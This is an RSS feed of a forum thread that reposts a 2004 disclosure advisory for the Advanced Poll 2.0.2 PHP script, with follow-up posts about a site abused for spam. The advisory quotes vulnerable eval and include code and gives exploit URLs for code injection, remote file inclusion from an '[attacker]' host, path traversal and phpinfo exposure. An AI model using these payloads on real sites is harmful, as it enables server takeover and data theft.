<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
	<channel>
		<title><![CDATA[Latest posts for the topic "Advanced Poll Remote Information Disclosure Vulnerability"]]></title>
		<link>https://proxy2.de/forum/posts/list/2.php</link>
		<description><![CDATA[Latest messages posted in the topic "Advanced Poll Remote Information Disclosure Vulnerability"]]></description>
		<generator>JForum - http://www.jforum.net</generator>
			<item>
				<title>Advanced Poll Remote Information Disclosure Vulnerability</title>
				<description><![CDATA[ It seems there is also a bug Advanced Poll 2.0.2<br /> <br /> <br /> °°°°°°°°°°°°° <br /> Language : PHP <br /> Product : Advanced Poll <br /> Version : 2.0.2 Textfile <br /> Website : <a class="snap_shots" href="http://www.proxy2.de" target="_blank" rel="nofollow">http://www.proxy2.de</a> <br /> Problems : <br /> - PHP Code Injection <br /> - File Include <br /> - Phpinfo <br /> <br /> <br /> <br /> PHP Code/Location : <br /> °°°°°°°°°°°°°°°°°°° <br /> <br /> <br /> comments.php : <br /> <br /> <br /> ------------------------------------------------------------------------------------------------------ <br /> [...] <br /> $register_poll_vars = array("id","template_set","action"); <br /> <br /> <br /> for ($i=0;$i&lt;sizeof($register_poll_vars);$i++) { <br />     if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) { <br />         eval("\$$register_poll_vars[$i] = <br /> \"".trim($HTTP_POST_VARS[$register_poll_vars[$i]])."\";"); <br />     } elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) { <br />         eval("\$$register_poll_vars[$i] = <br /> \"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";"); <br />     } else { <br />         eval("\$$register_poll_vars[$i] = '';"); <br />     } <br /> } <br /> [...] <br /> ------------------------------------------------------------------------------------------------------ <br /> <br /> <br /> <br /> <br /> booth.php, png.php : <br /> <br /> <br /> --------------------------------------------------------------- <br /> &lt;?php <br /> <br /> <br /> $include_path = dirname(__FILE__); <br /> if ($include_path == "/") { <br />     $include_path = "."; <br /> } <br /> <br /> <br /> if (!isset($PHP_SELF)) { <br />     global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS; <br />     $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"]; <br />     if (isset($HTTP_GET_VARS)) { <br />         while (list($name, $value)=each($HTTP_GET_VARS)) { <br />             $$name=$value; <br />         } <br />     } <br />     if (isset($HTTP_POST_VARS)) { <br />         while (list($name, $value)=each($HTTP_POST_VARS)) { <br />             $$name=$value; <br />         } <br />     } <br />     if(isset($HTTP_COOKIE_VARS)){ <br />         while (list($name, $value)=each($HTTP_COOKIE_VARS)){ <br />             $$name=$value; <br />         } <br />     } <br /> } <br /> <br /> <br /> require $include_path."/include/config.inc.php"; <br /> require $include_path."/include/class_poll.php"; <br /> [...] <br /> --------------------------------------------------------------- <br /> <br /> <br /> <br /> poll_ssi.php, popup.php : <br /> <br /> <br /> ---------------------- <br /> include "./booth.php"; <br /> ---------------------- <br /> <br /> <br /> <br /> <br /> <br /> admin/common.inc.php : <br /> <br /> <br /> --------------------------------------------------------------- <br /> [...] <br /> if (!isset($PHP_SELF)) { <br />     $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"]; <br />     if (isset($HTTP_GET_VARS)) { <br />         while (list($name, $value)=each($HTTP_GET_VARS)) { <br />             $$name=$value; <br />         } <br />     } <br />     if (isset($HTTP_POST_VARS)) { <br />         while (list($name, $value)=each($HTTP_POST_VARS)) { <br />             $$name=$value; <br />         } <br />     } <br />     if(isset($HTTP_COOKIE_VARS)){ <br />         while (list($name, $value)=each($HTTP_COOKIE_VARS)){ <br />             $$name=$value; <br />         } <br />     } <br /> } <br /> <br /> <br /> $pollvars['SELF'] = basename($PHP_SELF); <br /> unset($lang); <br /> if (file_exists("$base_path/lang/$pollvars[lang]")) { <br />     include ("$base_path/lang/$pollvars[lang]"); <br /> } else { <br />     include ("$base_path/lang/english.php"); <br /> } <br /> [...] <br /> --------------------------------------------------------------- <br /> <br /> <br /> <br /> In the /admin/ directory, in the files : <br /> <br /> <br /> - index.php <br /> - admin_tpl_new.php <br /> - admin_tpl_misc_new.php <br /> - admin_templates_misc.php <br /> - admin_templates.php <br /> - admin_stats.php <br /> - admin_settings.php <br /> - admin_preview.php <br /> - admin_password.php <br /> - admin_logout.php <br /> - admin_license.php <br /> - admin_help.php <br /> - admin_embed.php <br /> - admin_edit.php <br /> - admin_comment.php <br /> <br /> <br /> : <br /> <br /> <br /> ------------------------------------ <br /> [...] <br /> $include_path = dirname(__FILE__); <br /> $base_path = dirname($include_path); <br /> <br /> <br /> require "./common.inc.php"; <br /> [...] <br /> ------------------------------------ <br /> <br /> <br /> <br /> misc/info.php : <br /> <br /> <br /> ------------------------- <br /> &lt;html&gt; <br /> &lt;head&gt; <br /> &lt;title&gt;PHP Info&lt;/title&gt; <br /> &lt;/head&gt; <br /> &lt;body bgcolor="#3A6EA5"&gt; <br /> &lt;?php <br /> phpinfo(); <br /> ?&gt; <br /> ------------------------- <br /> <br /> <br /> <br /> Exploits : <br /> °°°°°°°° <br /> <br /> <br /> - if magic_quotes_gpc=OFF : <br /> <br /> <br /> <a class="snap_shots" href="http://" target="_blank" rel="nofollow">http://</a>[target]/comments.php?id=";[PHPCODE]//&amp;template_set=";[PHPCODE]//&amp;action=";[PHPCODE]// <br /> <br /> <br /> or with a POST form or cookies. <br /> <br /> <br /> - This will only work if register_globals=OFF (this is not an error...) : <br /> <br /> <br /> <a class="snap_shots" href="http://" target="_blank" rel="nofollow">http://</a>[target]/booth.php?include_path=http://[attacker] (or with png.php, <br /> poll_ssi.php, popup.php) will include the files : <br /> <a class="snap_shots" href="http://" target="_blank" rel="nofollow">http://</a>[attacker]/include/config.inc.php <br /> and <br /> <a class="snap_shots" href="http://" target="_blank" rel="nofollow">http://</a>[attacker]/include/class_poll.php <br /> <br /> <br /> - This will work if register_globals=OFF OR ON : <br /> <br /> <br /> <a class="snap_shots" href="http://" target="_blank" rel="nofollow">http://</a>[target]/admin/common.inc.php?basepath=http://[attacker] will include <br /> the file <a class="snap_shots" href="http://" target="_blank" rel="nofollow">http://</a>[attacker]/lang/english.php. <br /> <br /> <br /> The same hole can be found, in the /admin/ directory, in the files : <br /> <br /> <br /> - index.php <br /> - admin_tpl_new.php <br /> - admin_tpl_misc_new.php <br /> - admin_templates_misc.php <br /> - admin_templates.php <br /> - admin_stats.php <br /> - admin_settings.php <br /> - admin_preview.php <br /> - admin_password.php <br /> - admin_logout.php <br /> - admin_license.php <br /> - admin_help.php <br /> - admin_embed.php <br /> - admin_edit.php <br /> - admin_comment.php <br /> <br /> <br /> but only with register_globals=OFF. <br /> And, with register_globals=OFF and with all the files above again, the url <br /> <a class="snap_shots" href="http://" target="_blank" rel="nofollow">http://</a>[target]/admin/common.inc.php?base_path=..&amp;pollvars[lang]=../../../file/to/view <br /> will include the file <a class="snap_shots" href="http://" target="_blank" rel="nofollow">http://</a>[target]/admin/../../../file/to/view <br /> <br /> <br /> <br /> - <a class="snap_shots" href="http://" target="_blank" rel="nofollow">http://</a>[target]/misc/info.php will show the phpinfo(). <br /> <br /> <br /> <br /> Solution/More details : <br /> °°°°°°°°°°°°°°°°°°°° <br /> Both patch and details can be found on <a class="snap_shots" href="http://www.phpsecure.info" target="_blank" rel="nofollow">http://www.phpsecure.info</a> . <br /> <br /> <br /> <br /> Credits : <br /> °°°°°°°° <br /> frog-mn <br /> <a class="snap_shots" href="http://www.phpsecure.info" target="_blank" rel="nofollow">http://www.phpsecure.info</a>]]></description>
				<guid isPermaLink="true">https://proxy2.de/forum/posts/preList/3122/8286.php</guid>
				<link>https://proxy2.de/forum/posts/preList/3122/8286.php</link>
				<pubDate><![CDATA[Tue, 11 May 2004 10:30:29]]> GMT</pubDate>
				<author><![CDATA[ Jam'n]]></author>
			</item>
			<item>
				<title></title>
				<description><![CDATA[ I found out this the hard way. With version 2.03 of Advanced Poll the attackers used external scripts to send spam. Only when the web host disabled the website due to spam complaints did we find out.<br /> <br /> I hope this has been fixed in newer versions (I couldn't find a change log to check) before it happens to someone else.]]></description>
				<guid isPermaLink="true">https://proxy2.de/forum/posts/preList/3122/24078.php</guid>
				<link>https://proxy2.de/forum/posts/preList/3122/24078.php</link>
				<pubDate><![CDATA[Fri, 6 Jun 2008 08:16:20]]> GMT</pubDate>
				<author><![CDATA[ hailstone]]></author>
			</item>
			<item>
				<title></title>
				<description><![CDATA[ This is why you should always make sure your scripts are up to date.]]></description>
				<guid isPermaLink="true">https://proxy2.de/forum/posts/preList/3122/24079.php</guid>
				<link>https://proxy2.de/forum/posts/preList/3122/24079.php</link>
				<pubDate><![CDATA[Fri, 6 Jun 2008 09:13:12]]> GMT</pubDate>
				<author><![CDATA[ Carbonize]]></author>
			</item>
			<item>
				<title></title>
				<description><![CDATA[ Yes. Does that mean it is fixed?]]></description>
				<guid isPermaLink="true">https://proxy2.de/forum/posts/preList/3122/24080.php</guid>
				<link>https://proxy2.de/forum/posts/preList/3122/24080.php</link>
				<pubDate><![CDATA[Fri, 6 Jun 2008 10:01:21]]> GMT</pubDate>
				<author><![CDATA[ hailstone]]></author>
			</item>
			<item>
				<title></title>
				<description><![CDATA[ To the best of my knowledge but as no changelog is produced and I am not a user of the Poll I couldn't say.]]></description>
				<guid isPermaLink="true">https://proxy2.de/forum/posts/preList/3122/24081.php</guid>
				<link>https://proxy2.de/forum/posts/preList/3122/24081.php</link>
				<pubDate><![CDATA[Fri, 6 Jun 2008 17:12:59]]> GMT</pubDate>
				<author><![CDATA[ Carbonize]]></author>
			</item>
			<item>
				<title></title>
				<description><![CDATA[ Ok, thanks for your help.]]></description>
				<guid isPermaLink="true">https://proxy2.de/forum/posts/preList/3122/24083.php</guid>
				<link>https://proxy2.de/forum/posts/preList/3122/24083.php</link>
				<pubDate><![CDATA[Sat, 7 Jun 2008 10:37:36]]> GMT</pubDate>
				<author><![CDATA[ hailstone]]></author>
			</item>
			<item>
				<title></title>
				<description><![CDATA[ I found out this the hard way. With version 2.03 of Advanced Poll the attackers used external scripts to send spam. Only when the web host disabled the website due to spam complaints did we find out.]]></description>
				<guid isPermaLink="true">https://proxy2.de/forum/posts/preList/3122/24610.php</guid>
				<link>https://proxy2.de/forum/posts/preList/3122/24610.php</link>
				<pubDate><![CDATA[Fri, 3 Apr 2009 20:55:50]]> GMT</pubDate>
				<author><![CDATA[ indi456]]></author>
			</item>
	</channel>
</rss>